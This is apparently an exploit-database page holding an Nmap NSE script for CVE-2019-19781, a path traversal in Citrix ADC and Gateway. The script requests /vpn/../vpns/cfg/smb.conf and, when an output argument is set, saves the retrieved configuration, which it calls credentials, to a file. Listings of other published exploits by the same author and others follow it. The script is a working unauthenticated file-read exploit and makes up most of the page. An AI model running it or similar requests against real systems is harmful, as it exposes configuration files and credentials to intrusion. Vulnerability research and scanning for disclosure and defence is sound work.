Search for hundreds of thousands of exploits

"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal"

Author

Exploit author

"Dhiraj Mishra"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-01-16

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
# Date: 2019-12-17
# CVE: CVE-2019-19781
# Vulenrability: Path Traversal
# Vulnerablity Discovery: Mikhail Klyuchnikov
# Exploit Author: Dhiraj Mishra
# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0
# Vendor Homepage: https://www.citrix.com/
# References: https://support.citrix.com/article/CTX267027
# https://github.com/nmap/nmap/pull/1893

local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
local io = require "io"

description = [[
This NSE script checks whether the traget server is vulnerable to
CVE-2019-19781
]]
---
-- @usage
-- nmap --script https-citrix-path-traversal -p <port> <host>
-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args
output='file.txt'
-- @output
-- PORT   STATE SERVICE
-- 443/tcp open  http
-- | CVE-2019-19781:
-- |   Host is vulnerable to CVE-2019-19781
-- @changelog
-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)
-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)
-- @xmloutput
-- <table key="NMAP-1">
-- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,
11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path
-- traversal vulnerability that allows attackers to read configurations or
any other file.
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2019</elem>
-- <elem key="day">17</elem>
-- <elem key="month">12</elem>
-- </table>
-- </table>
-- <elem key="disclosure">17-12-2019</elem>
-- <table key="extra_info">
-- </table>
-- <table key="refs">
-- <elem>https://support.citrix.com/article/CTX267027</elem>
-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>
-- </table>
-- </table>

author = "Dhiraj Mishra (@RandomDhiraj)"
Discovery = "Mikhail Klyuchnikov (@__Mn1__)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive","vuln"}

portrule = shortport.ssl

action = function(host,port)
  local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
  local vuln = {
    title = 'Citrix ADC Path Traversal',
    state = vulns.STATE.NOT_VULN,
    description = [[
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,
12.1, and 13.0 are vulnerable
to a unauthenticated path traversal vulnerability that allows attackers to
read configurations or any other file.
    ]],
    references = {
      'https://support.citrix.com/article/CTX267027',
      'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
    },
    dates = {
      disclosure = {year = '2019', month = '12', day = '17'},
    },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local path = "/vpn/../vpns/cfg/smb.conf"
  local response
  local output = {}
  local success = "Host is vulnerable to CVE-2019-19781"
  local fail = "Host is not vulnerable"
  local match = "[global]"
  local credentials
  local citrixADC
  response = http.get(host, port.number, path)

  if not response.status then
    stdnse.print_debug("Request Failed")
    return
  end
  if response.status == 200 then
    if string.match(response.body, match) then
      stdnse.print_debug("%s: %s GET %s - 200 OK",
SCRIPT_NAME,host.targetname or host.ip, path)
      vuln.state = vulns.STATE.VULN
      citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname
or host.ip,port.number, path))
      if outputFile then
        credentials = response.body:gsub('%W','.')
vuln.check_results = stdnse.format_output(true, citrixADC)
        vuln.extra_info = stdnse.format_output(true, "Credentials are being
stored in the output file")
file = io.open(outputFile, "a")
file:write(credentials, "\n")
      else
        vuln.check_results = stdnse.format_output(true, citrixADC)
      end
    end
  elseif response.status == 403 then
    stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname
or host.ip, path, response.status)
    vuln.state = vulns.STATE.NOT_VULN
  end

  return vuln_report:make_output(vuln)
end
Release DateTitleTypePlatformAuthor
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-06"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"webappsmultiple"Jakub Palaczynski"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-06-24"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting"webappsmultiple"William Summerhill"
2020-06-22"WebPort 1.19.1 - Reflected Cross-Site Scripting"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-22"FileRun 2019.05.21 - Reflected Cross-Site Scripting"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-22"Odoo 12.0 - Local File Inclusion"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-17"OpenCTI 3.3.1 - Directory Traversal"webappsmultiple"Raif Berkay Dincel"
2020-06-15"SOS JobScheduler 1.13.3 - Stored Password Decryption"remotemultiple"Sander Ubink"
2020-06-12"SmarterMail 16 - Arbitrary File Upload"webappsmultiplevvhack.org
Release DateTitleTypePlatformAuthor
2020-04-23"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)"webappscgi"Dhiraj Mishra"
2020-03-11"Wing FTP Server - Authenticated CSRF (Delete Admin)"webappsphp"Dhiraj Mishra"
2020-02-06"VIM 8.2 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2020-01-16"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal"webappsmultiple"Dhiraj Mishra"
2019-06-06"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion"webappshardware"Dhiraj Mishra"
2019-05-27"Typora 0.9.9.24.6 - Directory Traversal"remotemacos"Dhiraj Mishra"
2019-04-30"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)"webappsjava"Dhiraj Mishra"
2019-04-26"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting"webappsjava"Dhiraj Mishra"
2019-04-18"Evernote 7.9 - Code Execution via Path Traversal"localmacos"Dhiraj Mishra"
2019-02-28"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service"doslinux"Dhiraj Mishra"
2019-01-21"GattLib 0.2 - Stack Buffer Overflow"remotelinux"Dhiraj Mishra"
2018-11-06"libiec61850 1.3 - Stack Based Buffer Overflow"locallinux"Dhiraj Mishra"
2018-08-23"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2018-08-14"cgit 1.2.1 - Directory Traversal (Metasploit)"webappslinux"Dhiraj Mishra"
2018-08-14"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)"webappslinux"Dhiraj Mishra"
2018-06-11"WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)"doslinux"Dhiraj Mishra"
2018-06-05"WebKitGTK+ < 2.21.3 - Crash (PoC)"locallinux"Dhiraj Mishra"
2018-06-01"Epiphany 3.28.2.1 - Denial of Service"dosmultiple"Dhiraj Mishra"
2018-04-05"WebRTC - Private IP Leakage (Metasploit)"webappsmultiple"Dhiraj Mishra"
2017-12-20"Samsung Internet Browser - SOP Bypass (Metasploit)"remoteandroid"Dhiraj Mishra"
2017-09-02"IBM Notes 8.5.x/9.0.x - Denial of Service"dosmultiple"Dhiraj Mishra"
2017-08-31"IBM Notes 8.5.x/9.0.x - Denial of Service (2)"dosmultiple"Dhiraj Mishra"
2017-08-31"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)"dosmultiple"Dhiraj Mishra"
2017-08-30"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery"webappsruby"Dhiraj Mishra"
2017-08-09"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery"webappsmultiple"Dhiraj Mishra"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47930/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.